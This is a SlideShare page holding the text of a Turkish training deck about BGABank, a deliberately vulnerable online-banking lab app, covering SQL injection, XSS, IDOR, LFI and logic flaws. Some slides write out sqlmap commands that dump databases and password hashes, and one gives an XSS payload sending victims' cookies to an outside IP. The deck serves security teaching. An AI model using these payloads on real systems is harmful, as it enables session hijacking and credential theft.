SlideShare ist ein Scribd-Unternehmen logo
1 von 25
Downloaden Sie, um offline zu lesen
ì	
  
BGABANK	
  -­‐	
  Vulnerable	
  Web	
  App	
  
Huzeyfe	
  ÖNAL	
  	
  &	
  	
  Celal	
  ERDIK	
  
Huzeyfe	
  ÖNAL:	
  
Kurumsal	
  Web:	
  
h<p://www.bga.com.tr	
  
	
  
Kişisel	
  Blog:	
  
h<p://www.lifeoverip.net	
  
	
  
İleKşim:	
  
huzeyfe.onal@bga.com.tr	
  
Huzeyfe.onal@gmail.com	
  
	
  
Celal	
  Erdik:	
  	
  
Kurumsal	
  Web:	
  
h<p://www.bga.com.tr	
  
	
  
Kişisel	
  Blog:	
  
h<p://www.networkpentest.net	
  
	
  
İleKşim:	
  
celal.erdik@bga.com.tr	
  
fc.erdik@gmail.com	
  
	
  
BgaBank	
  Hakkında	
  
ì  Vulnerable	
  Banka	
  İnternet	
  Şubesi	
  Uygulaması	
  
ì  IPS,WAF	
  ve	
  Güvenlik	
  duvarsız	
  erişim	
  kullanım	
  imkanı	
  
	
  -­‐	
  WaZest.bgabank.com	
  
	
  -­‐	
  Ipstest.bgabank.com	
  
	
  -­‐	
  www.bgabank.com	
  
ì  50+	
  teknik	
  ve	
  man^ksal	
  web	
  uygulama	
  açıklığı	
  
ì  Linux	
  sistem	
  üzerinde	
  hosKng.	
  
Sık	
  Görülen	
  Açıklıklar	
  
ì  Cross	
  site	
  scripKng	
  	
  
ì  Sql	
  İnjecKon	
  	
  
ì  Session	
  management	
  /	
  Login	
  Bypass	
  
ì  IDOR	
  –	
  Insecure	
  direct	
  object	
  referance	
  
ì  CSRF	
  
ì  Man^ksal	
  açıklıklar(Başka	
  hesaptan	
  havale,	
  kur	
  değişimi	
  vs.)	
  
SQL	
  Injection	
  Nedir?	
  
ì  Girdi	
  kontrolünün	
  sağlıklı	
  yapılmamasından	
  kaynaklanır.	
  
ì  Mevcut	
  SQL	
  cümleciğininin	
  değişKrilmesine	
  imkan	
  sağlar	
  
ì  SQL	
  InjecKon;	
  
ì  Saldırganlar	
  için	
  en	
  popüler,	
  	
  
ì  GelişKriciler	
  için	
  en	
  bilindik,	
  	
  
ì  İş	
  sahipleri	
  için	
  en	
  tehlikeli	
  	
  açıklık^r.	
  
ì  Hedef	
  veritabanında	
  uygulama	
  yolu	
  ile	
  yetkisiz	
  olarak	
  	
  sql	
  
sorgularının	
  çalış^rılabilmesidir.	
  
Sql	
  Injection	
  –	
  Sık	
  görülen	
  çeşitleri	
  
ì  Sık	
  Görülen	
  SQL	
  InjecKon	
  türleri;	
  
ì  Error	
  based	
  (Hata	
  mesajları	
  ile	
  ilerleme)	
  
ì  Blind	
  (Man^ksal	
  ifadeler	
  )	
  
ì  Boolean	
  based	
  (MatemaKksel	
  ifadeler)	
  
ì  Time	
  based	
  (waimor	
  delay,	
  sleep	
  fonk.	
  Zaman	
  tabanlı	
  sorgular)	
  
ì  Stack	
  based	
  (Kendi	
  sql	
  sorgunuzu	
  insert)	
  
Sql	
  İnjection	
  –	
  Neler	
  yapılabilir	
  
ì  Veritabanı	
  üzerinde	
  tam	
  hakimiyet;	
  
ì  İnsert	
  
ì  Update	
  
ì  Delete	
  
ì  Hedef	
  işleKm	
  sistemi	
  ele	
  geçirme	
  
ì  Mssql	
  –	
  xp_cmdshell	
  
ì  Mysql	
  –	
  Webshell,	
  phpmyadmin	
  
ì  Meterpreter	
  oturumu	
  ile	
  işleKm	
  sistemi	
  üzerinde	
  tam	
  kontrol	
  
Sql	
  Injection	
  –	
  Manuel	
  tespit	
  
ì  Error	
  based	
  sql	
  injecKon	
  manuel	
  test	
  
ì  h<p://isube.bgabank.com/index.php?
sayfa=arama.php&s1=test"&s2=	
  
Sql	
  Injection	
  –	
  Exploit	
  etme	
  
ì  ./sqlmap.py	
  -­‐u	
  "h<p://isube.bgabank.com/index.php?
sayfa=arama.php&s1=test&s2="	
  -­‐p	
  s1	
  -­‐-­‐dbms=mysql	
  -­‐-­‐
technique	
  E	
  -­‐-­‐risk	
  3	
  -­‐-­‐level	
  3	
  -­‐-­‐flush-­‐session	
  -­‐-­‐dbs	
  
Sql	
  İnjection	
  –	
  root	
  parolası	
  alma	
  
ì  ./sqlmap.py	
  -­‐u	
  "h<p://isube.bgabank.com/index.php?
sayfa=arama.php&s1=test&s2="	
  -­‐p	
  s1	
  -­‐-­‐dbms=mysql	
  -­‐-­‐
technique	
  E	
  -­‐-­‐risk	
  3	
  -­‐-­‐level	
  3	
  -­‐-­‐dbs	
  -­‐-­‐current-­‐user	
  –passwords	
  
Sql	
  İnjection	
  –	
  İşletim	
  Sistemi	
  ele	
  geçirme	
  
ì  Wfuzz,dirb	
  ile	
  phpmyadmin	
  arabirimi	
  bulunabilir.	
  
Sql	
  İnjection	
  –	
  Webshell	
  komut	
  çalıştırma	
  
Sql	
  İnjection	
  –	
  Login	
  Formu	
  Atlatma	
  
XSS(Cross	
  Site	
  Scripting)	
  Nedir?	
  
ì  Girdinin	
  üzerinde	
  bir	
  kontrol	
  yapılmadan	
  aynı	
  veya	
  başka	
  bir	
  
kullanıcıya	
  yansı^lması	
  
ì  Html/dhtml/css	
  veya	
  javascript	
  kodunun	
  izinsiz	
  olarak	
  kurbanın	
  
tarayıcısında	
  çalış^rılmasıdır.	
  
ì  Üç	
  genel	
  XSS	
  çeşidi	
  mevcu<ur;	
  
ì  Reflected	
  
ì  Stored	
  
ì  DOM	
  Based	
  
Reflected	
  XSS	
  –	
  Oturum	
  elde	
  etme	
  
ì  Url:	
  isube.bgabank.com/index.php?sayfa=arama.php&s1=&s2=	
  
ì  Payload:	
  "><Script>document.locaKon='h<p://85.95.238.172/
test.php?cookie='+document.cookie;<Script>	
  
ì  Apache	
  access	
  loglarından	
  kullanıcı	
  cookie	
  bilgisi	
  alınabilir.	
  
Reflected	
  XSS	
  –	
  Oturum	
  elde	
  etme	
  
ì  Cookie	
  manager	
  ile	
  elde	
  edilen	
  cookie	
  sisteme	
  eklenerek	
  
kullanıcı	
  oturumu	
  alınabilir.	
  
Stored	
  Xss	
  –	
  MT	
  Oturumu	
  alma	
  
ì  Müşteri	
  temsilcisine	
  mesaj	
  gönderirken	
  olması	
  durumunda	
  (!)	
  
Stored	
  XSS	
  –	
  MT	
  Oturumu	
  alma	
  
User	
  Agent	
  -­‐	
  Kısıtlamaları	
  Atlatma	
  
ì  Havale/EFT	
  işlemlerinde	
  mobil	
  uygulamalardan	
  yapılması	
  
durumunda	
  havale/eZ	
  ücreK	
  alınmama	
  hizmeK	
  suisKmal	
  
edilebilir.	
  
ì  User	
  agent	
  mobil	
  olarak	
  değişKrilip	
  bu	
  vb.	
  kısıtlamalar	
  
geçilebilir.	
  
ì  Yine	
  aynı	
  şekilde	
  mobil	
  uygulamalarda	
  login	
  formunda	
  captcha	
  
çıkmaması	
  durumunda	
  mobil	
  bir	
  user	
  agent	
  ile	
  sistemde	
  kaba	
  
kuvvet	
  saldırıları	
  gerçekleşKrilebilir.	
  
X-­‐Forwarde-­‐For	
  IP	
  Restriction	
  Atlatma	
  
ì  X-­‐forwarded-­‐for	
  başlık	
  bilgisine	
  göre	
  kontrol	
  edilmişse	
  atlatmak	
  
mümkündür.	
  
IDOR	
  –	
  Insecure	
  Direct	
  Object	
  Ref.	
  
ì  h<p://isube.bgabank.com/profil.aspx?musteriID=56	
  
bağlan^sı	
  üzerinde	
  musteriID	
  parametresindeki	
  değer	
  değişKrilerek	
  
diğer	
  müşterilere	
  ait	
  bilgiler	
  elde	
  edilebilmektedir.	
  
Dizin	
  Dolaşma/LFI	
  –	
  Local	
  File	
  Inclusion	
  
ì  Local	
  dosyayı	
  kaynak	
  koda	
  dahil	
  ederek	
  içeriğinin	
  
görüntülenmesi,	
  dizin	
  dolaşarak	
  local	
  dosya	
  bulma.	
  
Mantıksal	
  Açıklık–	
  Döviz	
  kuru	
  değiştirme	
  
Mantıksal	
  Açıklık	
  –	
  Döviz	
  kuru	
  değiştirme	
  	
  
HPP	
  –	
  Http	
  Parameter	
  Pollution	
  
ì  Bir	
  parametrenin	
  birden	
  çok	
  kez	
  kullanımı,	
  veya	
  farklı	
  
parametre	
  datalarının	
  birleşKrilmesi	
  
Dinlediğiniz	
  İçin	
  Teşekkürler	
  

Weitere ähnliche Inhalte

Was ist angesagt?

Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama Güvenliği
BGA Cyber Security
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101
Mehmet Ince
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
BGA Cyber Security
 

Was ist angesagt? (20)

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Mail Sniper Nedir?
Mail Sniper Nedir?Mail Sniper Nedir?
Mail Sniper Nedir?
 
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka Kapılar
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
 
Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama Güvenliği
 
Ofansif ve Defansif Powershell
Ofansif ve Defansif PowershellOfansif ve Defansif Powershell
Ofansif ve Defansif Powershell
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu Analizi
 
İleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabıİleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabı
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 
Mobil Uygulama Güvenlik Testlerinde Sertifika Sabitleme Özelliğinin Atlatılması
Mobil Uygulama Güvenlik Testlerinde Sertifika Sabitleme Özelliğinin AtlatılmasıMobil Uygulama Güvenlik Testlerinde Sertifika Sabitleme Özelliğinin Atlatılması
Mobil Uygulama Güvenlik Testlerinde Sertifika Sabitleme Özelliğinin Atlatılması
 
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİGÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
 
Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service Normshield - Cloud Based Vulnerability Scan Service
Normshield - Cloud Based Vulnerability Scan Service
 
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
 

Ähnlich wie 8 Ocak 2015 SOME Etkinligi - BGA Bank Vulnerable Web Application

Ähnlich wie 8 Ocak 2015 SOME Etkinligi - BGA Bank Vulnerable Web Application (12)

WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
Bga Bank Ultimate Representation
Bga Bank Ultimate RepresentationBga Bank Ultimate Representation
Bga Bank Ultimate Representation
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
Webtasarim
WebtasarimWebtasarim
Webtasarim
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
 
Cuneyd Uzun - Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun -  Dijital Dünyada Siber Risk YönetimiCuneyd Uzun -  Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun - Dijital Dünyada Siber Risk Yönetimi
 
2013 - APPSEC - Saldırı Engelleme Sistemleri ve Web Atakları
2013 - APPSEC  - Saldırı Engelleme Sistemleri ve Web Atakları2013 - APPSEC  - Saldırı Engelleme Sistemleri ve Web Atakları
2013 - APPSEC - Saldırı Engelleme Sistemleri ve Web Atakları
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
Jsf
JsfJsf
Jsf
 
Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Ozgur web teknolojileri'13
Ozgur web teknolojileri'13
 
Weblogic performance tips&tricks
Weblogic performance tips&tricksWeblogic performance tips&tricks
Weblogic performance tips&tricks
 

Mehr von BGA Cyber Security

Mehr von BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

8 Ocak 2015 SOME Etkinligi - BGA Bank Vulnerable Web Application

  • 1. ì   BGABANK  -­‐  Vulnerable  Web  App   Huzeyfe  ÖNAL    &    Celal  ERDIK   Huzeyfe  ÖNAL:   Kurumsal  Web:   h<p://www.bga.com.tr     Kişisel  Blog:   h<p://www.lifeoverip.net     İleKşim:   huzeyfe.onal@bga.com.tr   Huzeyfe.onal@gmail.com     Celal  Erdik:     Kurumsal  Web:   h<p://www.bga.com.tr     Kişisel  Blog:   h<p://www.networkpentest.net     İleKşim:   celal.erdik@bga.com.tr   fc.erdik@gmail.com    
  • 2. BgaBank  Hakkında   ì  Vulnerable  Banka  İnternet  Şubesi  Uygulaması   ì  IPS,WAF  ve  Güvenlik  duvarsız  erişim  kullanım  imkanı    -­‐  WaZest.bgabank.com    -­‐  Ipstest.bgabank.com    -­‐  www.bgabank.com   ì  50+  teknik  ve  man^ksal  web  uygulama  açıklığı   ì  Linux  sistem  üzerinde  hosKng.  
  • 3. Sık  Görülen  Açıklıklar   ì  Cross  site  scripKng     ì  Sql  İnjecKon     ì  Session  management  /  Login  Bypass   ì  IDOR  –  Insecure  direct  object  referance   ì  CSRF   ì  Man^ksal  açıklıklar(Başka  hesaptan  havale,  kur  değişimi  vs.)  
  • 4. SQL  Injection  Nedir?   ì  Girdi  kontrolünün  sağlıklı  yapılmamasından  kaynaklanır.   ì  Mevcut  SQL  cümleciğininin  değişKrilmesine  imkan  sağlar   ì  SQL  InjecKon;   ì  Saldırganlar  için  en  popüler,     ì  GelişKriciler  için  en  bilindik,     ì  İş  sahipleri  için  en  tehlikeli    açıklık^r.   ì  Hedef  veritabanında  uygulama  yolu  ile  yetkisiz  olarak    sql   sorgularının  çalış^rılabilmesidir.  
  • 5. Sql  Injection  –  Sık  görülen  çeşitleri   ì  Sık  Görülen  SQL  InjecKon  türleri;   ì  Error  based  (Hata  mesajları  ile  ilerleme)   ì  Blind  (Man^ksal  ifadeler  )   ì  Boolean  based  (MatemaKksel  ifadeler)   ì  Time  based  (waimor  delay,  sleep  fonk.  Zaman  tabanlı  sorgular)   ì  Stack  based  (Kendi  sql  sorgunuzu  insert)  
  • 6. Sql  İnjection  –  Neler  yapılabilir   ì  Veritabanı  üzerinde  tam  hakimiyet;   ì  İnsert   ì  Update   ì  Delete   ì  Hedef  işleKm  sistemi  ele  geçirme   ì  Mssql  –  xp_cmdshell   ì  Mysql  –  Webshell,  phpmyadmin   ì  Meterpreter  oturumu  ile  işleKm  sistemi  üzerinde  tam  kontrol  
  • 7. Sql  Injection  –  Manuel  tespit   ì  Error  based  sql  injecKon  manuel  test   ì  h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test"&s2=  
  • 8. Sql  Injection  –  Exploit  etme   ì  ./sqlmap.py  -­‐u  "h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test&s2="  -­‐p  s1  -­‐-­‐dbms=mysql  -­‐-­‐ technique  E  -­‐-­‐risk  3  -­‐-­‐level  3  -­‐-­‐flush-­‐session  -­‐-­‐dbs  
  • 9. Sql  İnjection  –  root  parolası  alma   ì  ./sqlmap.py  -­‐u  "h<p://isube.bgabank.com/index.php? sayfa=arama.php&s1=test&s2="  -­‐p  s1  -­‐-­‐dbms=mysql  -­‐-­‐ technique  E  -­‐-­‐risk  3  -­‐-­‐level  3  -­‐-­‐dbs  -­‐-­‐current-­‐user  –passwords  
  • 10. Sql  İnjection  –  İşletim  Sistemi  ele  geçirme   ì  Wfuzz,dirb  ile  phpmyadmin  arabirimi  bulunabilir.  
  • 11. Sql  İnjection  –  Webshell  komut  çalıştırma  
  • 12. Sql  İnjection  –  Login  Formu  Atlatma  
  • 13. XSS(Cross  Site  Scripting)  Nedir?   ì  Girdinin  üzerinde  bir  kontrol  yapılmadan  aynı  veya  başka  bir   kullanıcıya  yansı^lması   ì  Html/dhtml/css  veya  javascript  kodunun  izinsiz  olarak  kurbanın   tarayıcısında  çalış^rılmasıdır.   ì  Üç  genel  XSS  çeşidi  mevcu<ur;   ì  Reflected   ì  Stored   ì  DOM  Based  
  • 14. Reflected  XSS  –  Oturum  elde  etme   ì  Url:  isube.bgabank.com/index.php?sayfa=arama.php&s1=&s2=   ì  Payload:  "><Script>document.locaKon='h<p://85.95.238.172/ test.php?cookie='+document.cookie;<Script>   ì  Apache  access  loglarından  kullanıcı  cookie  bilgisi  alınabilir.  
  • 15. Reflected  XSS  –  Oturum  elde  etme   ì  Cookie  manager  ile  elde  edilen  cookie  sisteme  eklenerek   kullanıcı  oturumu  alınabilir.  
  • 16. Stored  Xss  –  MT  Oturumu  alma   ì  Müşteri  temsilcisine  mesaj  gönderirken  olması  durumunda  (!)  
  • 17. Stored  XSS  –  MT  Oturumu  alma  
  • 18. User  Agent  -­‐  Kısıtlamaları  Atlatma   ì  Havale/EFT  işlemlerinde  mobil  uygulamalardan  yapılması   durumunda  havale/eZ  ücreK  alınmama  hizmeK  suisKmal   edilebilir.   ì  User  agent  mobil  olarak  değişKrilip  bu  vb.  kısıtlamalar   geçilebilir.   ì  Yine  aynı  şekilde  mobil  uygulamalarda  login  formunda  captcha   çıkmaması  durumunda  mobil  bir  user  agent  ile  sistemde  kaba   kuvvet  saldırıları  gerçekleşKrilebilir.  
  • 19. X-­‐Forwarde-­‐For  IP  Restriction  Atlatma   ì  X-­‐forwarded-­‐for  başlık  bilgisine  göre  kontrol  edilmişse  atlatmak   mümkündür.  
  • 20. IDOR  –  Insecure  Direct  Object  Ref.   ì  h<p://isube.bgabank.com/profil.aspx?musteriID=56   bağlan^sı  üzerinde  musteriID  parametresindeki  değer  değişKrilerek   diğer  müşterilere  ait  bilgiler  elde  edilebilmektedir.  
  • 21. Dizin  Dolaşma/LFI  –  Local  File  Inclusion   ì  Local  dosyayı  kaynak  koda  dahil  ederek  içeriğinin   görüntülenmesi,  dizin  dolaşarak  local  dosya  bulma.  
  • 22. Mantıksal  Açıklık–  Döviz  kuru  değiştirme  
  • 23. Mantıksal  Açıklık  –  Döviz  kuru  değiştirme    
  • 24. HPP  –  Http  Parameter  Pollution   ì  Bir  parametrenin  birden  çok  kez  kullanımı,  veya  farklı   parametre  datalarının  birleşKrilmesi